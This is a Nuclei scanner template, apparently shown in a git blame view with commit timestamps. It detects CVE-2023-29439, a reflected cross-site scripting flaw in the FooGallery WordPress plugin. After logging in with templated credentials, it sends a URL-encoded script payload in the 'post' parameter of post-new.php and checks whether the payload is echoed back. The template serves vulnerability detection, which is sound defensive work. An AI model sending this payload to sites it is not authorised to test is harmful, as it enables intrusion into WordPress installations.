2023-10-17 07:20:28 +00:00
|
|
|
id: CVE-2023-29439
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: FooGallery plugin <= 2.2.35 - Cross-Site Scripting
|
|
|
|
author: theamanrawat
|
|
|
|
severity: medium
|
|
|
|
description: |
|
|
|
|
Reflected Cross-Site Scripting (XSS) vulnerability in FooPlugins FooGallery plugin <= 2.2.35 versions.
|
|
|
|
reference:
|
|
|
|
- https://lourcode.kr/posts/CVE-2023-29439-Analysis?_s_id=cve
|
|
|
|
- https://wordpress.org/plugins/foogallery/
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-29439
|
2023-10-17 17:52:26 +00:00
|
|
|
- https://patchstack.com/database/vulnerability/foogallery/wordpress-foogallery-plugin-2-2-35-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve
|
2024-01-29 17:11:14 +00:00
|
|
|
- https://github.com/ARPSyndicate/cvemon
|
2023-10-17 07:20:28 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 6.1
|
|
|
|
cve-id: CVE-2023-29439
|
|
|
|
cwe-id: CWE-79
|
2024-01-14 13:49:27 +00:00
|
|
|
epss-score: 0.00087
|
2024-03-23 09:28:19 +00:00
|
|
|
epss-percentile: 0.35426
|
2023-10-17 17:52:26 +00:00
|
|
|
cpe: cpe:2.3:a:fooplugins:foogallery:*:*:*:*:*:wordpress:*:*
|
2023-10-17 07:20:28 +00:00
|
|
|
metadata:
|
|
|
|
verified: "true"
|
|
|
|
max-request: 2
|
2023-10-17 17:52:26 +00:00
|
|
|
vendor: fooplugins
|
|
|
|
product: foogallery
|
|
|
|
framework: wordpress
|
|
|
|
publicwww-query: "/wp-content/plugins/foogallery/"
|
2023-12-05 09:50:33 +00:00
|
|
|
tags: cve,cve2023,xss,wordpress,wp-plugin,wp,foogallery,authenticated,fooplugins
|
2023-10-17 07:20:28 +00:00
|
|
|
|
|
|
|
http:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /wp-login.php HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Content-Type: application/x-www-form-urlencoded
|
|
|
|
|
|
|
|
log={{username}}&pwd={{password}}&wp-submit=Log+In
|
|
|
|
- |
|
|
|
|
GET /wp-admin/post-new.php?post_type=foogallery&post=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- 'data-gallery_id="\"><script>alert(document.domain)</script>"'
|
|
|
|
- 'foogallery-image-edit-modal'
|
|
|
|
condition: and
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
part: header
|
|
|
|
words:
|
|
|
|
- "text/html"
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2024-03-25 11:57:16 +00:00
|
|
|
# digest: 4a0a00473045022051404fd5879c74f26f3e3d20328728775676899601fe56240a8c3865b521c780022100c0508c953de3425517b071c0abbd29036e2b125ba1af7a21b20557e1107caf9c:922c64590222798bb761d5b6d8e72950
|